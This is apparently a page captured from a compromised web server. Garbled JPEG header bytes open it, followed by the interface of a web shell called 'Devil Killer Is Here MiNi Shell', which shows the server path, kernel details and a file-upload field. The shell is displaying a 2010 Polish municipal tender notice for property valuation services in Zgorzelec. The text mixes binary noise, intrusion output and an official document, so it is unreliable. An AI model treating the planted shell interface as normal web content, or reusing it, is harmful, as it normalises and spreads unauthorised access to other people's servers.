JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100414/84357-N-2010.html

<p class="kh_header"><b>Zgorzelec: Usługi w zakresie wycen nieruchomości na rzecz Gminy Miejskiej Zgorzelec</b><br>
<b>Numer ogłoszenia: 84357 - 2010; data zamieszczenia: 14.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie wycen nieruchomości na rzecz Gminy Miejskiej Zgorzelec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonywanie usług przez rzeczoznawcę majątkowego w zakresie wycen nieruchomości na rzecz Gminy Miejskiej Zgorzelec.

2.W zakres przedmiotu zamówienia wchodzą poniższe kategorie zleceń:.
        
1)wycena lokali mieszkalnych z wyodrębnieniem wartości przynależnego gruntu z wypisem i wyrysem z ewidencji gruntów wraz z określeniem wartości nakładów poniesionych przez najemcę,
2)wycena lokali użytkowych z wyodrębnieniem wartości przynależnego gruntu  wraz  z wypisem i wyrysem z ewidencji gruntów wraz z określeniem wartości nakładów poniesionych przez najemcę,
3)inwentaryzacje lokali wraz z uzyskaniem zaświadczenia o samodzielności lokalu potwierdzonego przez Starostę,
4)wycena garaży z wyodrębnieniem wartości gruntu wraz z wypisem i wyrysem z ewidencji gruntów wraz z określeniem wartości nakładów poniesionych przez najemcę,
5) wycena działek wraz z wypisem i wyrysem z ewidencji gruntów,
6) wycena każdej następnej działki w ramach obszaru objętego jednym zleceniem,
7) wycena działek do przekształcenia prawa użytkowania wieczystego w prawo własności,
8)wycena działek do przekształcenia prawa użytkowania wieczystego w prawo własności - zabudowanej budynkiem wielorodzinnym do 7 lokali,
9)wycena działek do przekształcenia prawa użytkowania wieczystego w prawo własności - zabudowanej budynkiem wielorodzinnym powyżej 7 lokali,
10) wycena działek do wykupu prawa użytkowania wieczystego na własność,
11)wycena nieruchomości zabudowanych obiektami o łącznej kubaturze do 1000m3   z wypisem i wyrysem z ewidencji gruntów oraz określenie wartości nakładów poniesionych przez najemcę,
12)	wycena nieruchomości zabudowanych obiektami o łącznej kubaturze od 1000m3 do 3000m3 z wypisem i wyrysem z ewidencji gruntów oraz określenie wartości nakładów poniesionych przez najemcę,
13)	wycena nieruchomości zabudowanych obiektami o łącznej kubaturze od 3000m3 do 10000m3 z wypisem i wyrysem z ewidencji gruntów oraz określenie wartości nakładów poniesionych przez najemcę,
14) inwentaryzacja  budowlana uproszczona za 1m2 mierzonej powierzchni,
15) korekta udziałów procentowych lokali w nieruchomości wspólnej - określenie jednego udziału,
16)  aktualizacja operatów szacunkowych - zgodnie z załącznikiem Nr 1 do SIWZ,
17)  wycena nasadzeń trwałych  -  za jedno nasadzenie,
18)  wycena działek dla potrzeb ustalenia wysokości opłat adiacenckich,
19)  aktualizacja opłaty rocznej z tytułu użytkowania wieczystego gruntu,
20)  wycena ograniczonego prawa rzeczowego.

3.	Realizacja przedmiotu zamówienia nastąpi z uwzględnieniem poniższych postanowień:
1)	Dokumentację dotyczącą wycen należy sporządzić w formie operatu szacunkowego, zgodnie z rozporządzeniem Rady Ministrów z dnia 21 września 2004 r. w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz. U. z 2004 r., Nr 207, poz. 2109 ze zm.),
2)	przedmiot zamówienia realizowany będzie na podstawie zleceń, wystawionych każdorazowo przez Zamawiającego wg bieżących potrzeb,
3)	Wykonawca zobowiązany będzie do sukcesywnego, tj. co najmniej raz w tygodniu odbierania zleceń w siedzibie Zamawiającego. Wykonawca zwolniony będzie z tego obowiązku tylko  w przypadku wystąpienia zdarzeń losowych niezależnych od Wykonawcy, potwierdzonych w formie opisowej wraz z dokumentami potwierdzającymi powyższą okoliczność. W przypadku nieuzasadnionego niestawienia się po odbiór zleceń, Zamawiający wezwie Wykonawcę do natychmiastowego stawiennictwa celem odbioru zlecenia. Nie podjęcie czynności odbioru zleceń w określonym przez Zamawiającego w wezwaniu terminie będzie powodowało naliczenie kary umownej, zgodnie z zapisami projektu umowy,
4)	termin realizacji zlecenia będzie wskazany przez Zamawiającego każdorazowo w zleceniu. Minimalny termin realizacji nie będzie krótszy niż 7 dni roboczych od dnia przyjęcia zlecenia przez Wykonawcę,
5)	w przypadku konieczności potwierdzenia aktualności operatu szacunkowego w okresie  24 miesięcy od daty jego sporządzenia, Wykonawca zobowiązany jest do umieszczenia na operacie szacunkowym stosownej klauzuli zgodnie z art. 156 ust. 4 ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami. Potwierdzenie aktualności operatu szacunkowego winno być dokonane w ciągu 7 dni kalendarzowych od daty otrzymania zlecenia,
6)	Wykonawca zobowiązany jest do aktualizacji operatów szacunkowych w przypadku zmian uwarunkowań prawnych lub istotnych czynników, o których mowa w art. 156 ust. 3 ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami, w okresie 24 miesięcy od daty sporządzenia operatów szacunkowych. Potwierdzenie aktualności operatu szacunkowego winno być dokonane w ciągu 7 dni kalendarzowych od daty otrzymania zlecenia,
7)	Wykonawca sporządzi i dostarczy do siedziby Zamawiającego wykonaną zgodnie ze zleceniem dokumentację w dwóch jednobrzmiących egzemplarzach,
8)	Niezbędne materiały wymagane do wykonania zleconej dokumentacji, m.in.: mapy ewidencyjne gruntów i budynków oraz wypisy z ewidencji gruntów Wykonawca uzyska we własnym zakresie i na własny koszt,
9)	W zakresie sporządzonego przez siebie operatu szacunkowego, Wykonawca zobowiązany będzie do udziału w rozprawach administracyjnych, sądowych bądź postępowaniach przed organem odwoławczym bez dodatkowego wynagrodzenia. Wykonawca zwolniony będzie  z tego obowiązku tylko w przypadku wystąpienia zdarzeń losowych niezależnych od Wykonawcy, potwierdzonych w formie opisowej wraz z dokumentami potwierdzającymi powyższą okoliczność. W przypadku nieuzasadnionego braku uczestnictwa w rozprawach lub postępowaniach, Zamawiający będzie naliczał kary umowne, zgodnie z zapisami projektu umowy,
10)	Wykonawca zobowiązany będzie do udzielenia pisemnych wyjaśnień na żądanie Zamawiającego w przedmiocie sporządzonego operatu szacunkowego w terminie do 10 dni kalendarzowych od daty doręczenia pisemnego żądania.
11)	Szczegółowy zakres przedmiotu zamówienia został określony w Załączniku Nr 1 do SIWZ,
12)	Wykonawca określi w formularzu cenowym ceny jednostkowe za usługi objęte przedmiotem niniejszego postępowania, zgodnie z Załącznikiem Nr 1 do SIWZ,
13)	Przedmiot zamówienia należy wykonać zgodnie z ustawą z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (t.j. z 2004 r., Dz. U. Nr 261, poz. 2603   ze zm.) oraz rozporządzeniem Rady Ministrów z dnia 21 września 2004 r. w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz. U.  z 2004 r., Nr 207, poz. 2109 ze zm.), zgodnie z zasadami obowiązującymi rzeczoznawcę majątkowego zawartymi  w Kodeksie Etyki Zawodowej Rzeczoznawców Majątkowych, tj. rzetelnie, uczciwie, ze szczególną starannością i zachowaniem tajemnicy zawodowej oraz zgodnie z wytycznymi zawartymi w standardach zawodowych dotyczących wyceny nieruchomości, a także z postanowieniami niniejszej specyfikacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)Wykonawca wniesie wadium w wysokości 6.400,00 zł przed upływem terminu  składania ofert, który został określony w pkt. 16.1 SIWZ.

2)W zależności od woli Wykonawcy wadium może być wnoszone w formach:

1)	pieniądzu (przelew na rachunek bankowy wskazany przez zamawiającego),
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art.. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r.  o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.)

3)	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego Nr 35124012971111000025654013 w banku PeKaO S.A. I O/Zgorzelec.
 Potwierdzeniem tej formy wniesienia wadium będzie kopia przelewu (wpłaty)  
 załączona do oferty z dopiskiem Wadium do postępowania nr WZP.341-15/10.
		
4)	Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium zostanie wykluczony z postępowania o udzielenie zamówienia, a jego oferta zostanie odrzucona zgodnie z art. 24 ust. 2 pkt 4 ustawy Prawo zamówień publicznych.

5)	Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza,  z zastrzeżeniem pkt. 6 SIWZ.

6)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

7)	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
8)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy,
4)	w przypadku określonym w pkt. 6.

9)	W przypadku wniesienia wadium w formach  wymienionych w pkt. 2 pkt od 2 do 5 z treści dokumentu musi jednoznacznie wynikać, iż wypłata Zamawiającemu sumy gwarancyjnej nastąpi także w przypadku określonym w pkt. 6. 

10)	Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za   wniesione prawidłowo.

11)	Zamawiający wymaga, aby niepieniężne formy zapłaty wadium miały charakter nieodwołalny i bezwarunkowy - równoważny pieniądzu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w ww. zakresie złoży oświadczenie o spełnianiu warunku udziału w  postępowaniu.                
Ocena spełnienia warunku nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń, wymienionych w pkt. 10 SIWZ metodą spełnia/ nie spełnia.
Nie wykazanie  w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - w tym okresie, wykonał lub wykonuje należycie 2 usługi z zakresu wykonywania wycen nieruchomości z podaniem ich łącznej wartości brutto nie mniejszej niż 200 tys. oraz daty i miejsca wykonania z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane lub są wykonywane należycie. (formularz Nr  3 do SIWZ).
W przypadku usług wykonywanych, Wykonawca w formularzu Nr 3, w poz. wartość brutto uwzględnia faktycznie uzyskane wynagrodzenie do dnia złożenia oferty w przedmiotowym postępowaniu.
Ocena spełnienia warunku nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń, wymienionych w pkt. 10 SIWZ metoda spełnia/ nie spełnia.
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w ww. zakresie złoży oświadczenie o spełnianiu warunku udziału w  postępowaniu.                
Ocena spełnienia warunku nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń, wymienionych w pkt. 10 SIWZ metodą spełnia/ nie spełnia.
Nie wykazanie  w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uznany za spełniony, jeżeli Wykonawca:
a)	wykaże się dysponowaniem co najmniej jedną osobą posiadającą uprawnienia rzeczoznawcy majątkowego - uprawnienia zawodowe w zakresie szacowania nieruchomości zgodnie  z ustawą z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami i posiadającą co najmniej  5 letni staż pracy w tym zawodzie wraz z informacją o podstawie dysponowania tą osobą - Wykonawca złoży oświadczenie o dysponowaniu bądź poleganiu na zasobach innych podmiotów w tym zakresie - formularz Nr 4 do SIWZ,

b)	złoży oświadczenie, że osoby, o których mowa w pkt. a), które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia.
Ocena spełnienia powyższych warunków nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń, wymienionych w pkt. 10 SIWZ metodą spełnia/ nie spełnia.
  Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tych  warunków spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w ww. zakresie złoży oświadczenie o spełnianiu warunku udziału w  postępowaniu.                
Ocena spełnienia warunku nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń, wymienionych w pkt. 10 SIWZ metodą spełnia/ nie spełnia.
 Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi złożyć następujące dokumenty, pod rygorem odrzucenia  oferty  zgodnie z art. 89 ust. 1 pkt. 2 , z zastrzeżeniem art. 87 ust. 2 pkt. 3 ustawy PZP oraz art. 26 ust. 3 w zakresie dokumentu wskazanego w pkt. 2:

1)	wypełniony  formularz cenowy - formularz Nr 1,

2)	oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust.1 (formularz Nr  2 do SIWZ)
   
3)	wypełniony formularz oświadczenia wskazującego część zamówienia, której wykonawca powierzy podwykonawcom, z uwzględnieniem zapisu pkt. 9.2 SIWZ - formularz nr  5  do SIWZ,
W przypadku nie dołączenia do oferty powyższego formularza, bądź jego nie wypełnienia, Zamawiający uzna, że Wykonawca wykona zamówienie własnymi siłami. W przypadku kiedy Wykonawca będzie korzystał z wiedzy i doświadczenia innych podmiotów, a nie załączy przedmiotowego formularza do oferty, Zamawiający nie będzie mógł uznać spełnienia warunku określonego w pkt. 9.1 ppkt. 2 SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z art. 144 ust. 1 ustawy PZP Zamawiający przewiduje możliwość  
      dokonania  zmiany postanowień zawartej umowy w stosunku do treści oferty, na 
       podstawie której dokonał wyboru Wykonawcy. Przyczyny zmian:
1)	przestoje i opóźnienia zawinione przez Zamawiającego,
2)	odmowa wydania lub przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji dokumentów niezbędnych do wykonania zleconej dokumentacji. Wykonawca będzie zobowiązany do przedstawienia Zamawiającemu dokumentów potwierdzających powyższe okoliczności,
3)	zmianę regulacji prawnych obowiązujących w dniu podpisania umowy,
4)	zmianę danych adresowych określonych w projekcie umowie

2.	Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej, potwierdzonej przez każdą ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Zgorzelcu
59-900 Zgorzelec, ul. Domańskiego 6,pokój nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2010 godzina 10:00, miejsce: w siedzibie  Zamawiającego tj.:
Punkt Obsługi Interesanta
Urząd Miasta w Zgorzelcu, 59-900 Zgorzelec, ul. Domańskiego 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
